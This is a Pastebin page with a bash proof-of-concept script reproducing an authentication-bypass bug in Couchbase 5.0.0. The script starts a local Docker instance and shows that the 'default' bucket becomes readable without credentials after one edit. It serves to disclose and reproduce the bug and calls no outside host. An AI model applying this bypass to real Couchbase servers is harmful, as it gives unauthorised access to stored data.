Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- #
- # Couchbase 5.0.0 "edit-to-free" Security Bug
- # ===========================================
- #
- # Couchbase 5 introduced RBAC. So clients always have to provide an
- # authentication to use access on any bucket. But in case of the 'default'
- # bucket, if we edit the bucket once, clients can access without
- # authentication.
- #
- # Heungsub Lee <sub@subl.ee>
- #
- set -euo pipefail
- # only 'default' bucket has this problem
- CB_BUCKET='default'
- # create new couchbase 5.0
- docker run -d --name=cb5 \
- -p 8091-8094:8091-8094 -p 11210:11210 \
- couchbase:enterprise-5.0.0
- trap finalize EXIT
- finalize() {
- docker rm -f cb5
- }
- # wait for couchbase ready
- sleep 10
- # init new cluster
- docker exec cb5 mkdir -p /data/data
- docker exec cb5 mkdir -p /data/index
- docker exec cb5 chown couchbase /data/data
- docker exec cb5 chown couchbase /data/index
- docker exec cb5 /opt/couchbase/bin/couchbase-cli node-init \
- --cluster='127.0.0.1:8091' \
- --user='Administrator' \
- --password='password' \
- --node-init-data-path='/data/data' \
- --node-init-index-path='/data/index'
- docker exec cb5 /opt/couchbase/bin/couchbase-cli cluster-init \
- --cluster='127.0.0.1:8091' \
- --cluster-username='Administrator' \
- --cluster-password='PaSsWoRd' \
- --cluster-port='8091' \
- --cluster-ramsize='512' \
- --cluster-index-ramsize='256' \
- --cluster-fts-ramsize='256' \
- --index-storage-setting='default' \
- --services='data,index,query'
- docker exec cb5 /opt/couchbase/bin/couchbase-cli setting-cluster \
- --cluster='127.0.0.1:8091' \
- --user='Administrator' \
- --password='PaSsWoRd' \
- --cluster-name='test'
- # create new bucket 'default'
- docker exec cb5 /opt/couchbase/bin/couchbase-cli bucket-create \
- --cluster='127.0.0.1:8091' \
- --user='Administrator' \
- --password='PaSsWoRd' \
- --bucket="$CB_BUCKET" \
- --bucket-ramsize='512' \
- --bucket-replica='0' \
- --bucket-type='couchbase' \
- --bucket-priority='high' \
- --bucket-eviction-policy='fullEviction' \
- --enable-flush='1' \
- --enable-index-replica='0' \
- --conflict-resolution='sequence' \
- --wait
- # 1. not possible to get bucket without auth
- echo
- echo '========================================================================'
- echo ' 1. not possible to get bucket without auth'
- echo '========================================================================'
- cat <<EOF | python || true
- from couchbase.bucket import Bucket
- print(Bucket('couchbase://127.0.0.1/$CB_BUCKET'))
- EOF
- # 2. edit bucket
- echo
- echo '========================================================================'
- echo ' 2. edit bucket'
- echo '========================================================================'
- docker exec cb5 /opt/couchbase/bin/couchbase-cli bucket-edit \
- --cluster='127.0.0.1:8091' \
- --user='Administrator' \
- --password='PaSsWoRd' \
- --bucket="$CB_BUCKET"
- # 3. now we can get bucket without auth
- echo
- echo '========================================================================'
- echo ' 3. now we can get bucket without auth'
- echo '========================================================================'
- # if the problem is not reproduced, here fails with non-zero exit code.
- cat <<EOF | python
- from couchbase.bucket import Bucket
- print(Bucket('couchbase://127.0.0.1/$CB_BUCKET'))
- EOF
Add Comment
Please, Sign In to add comment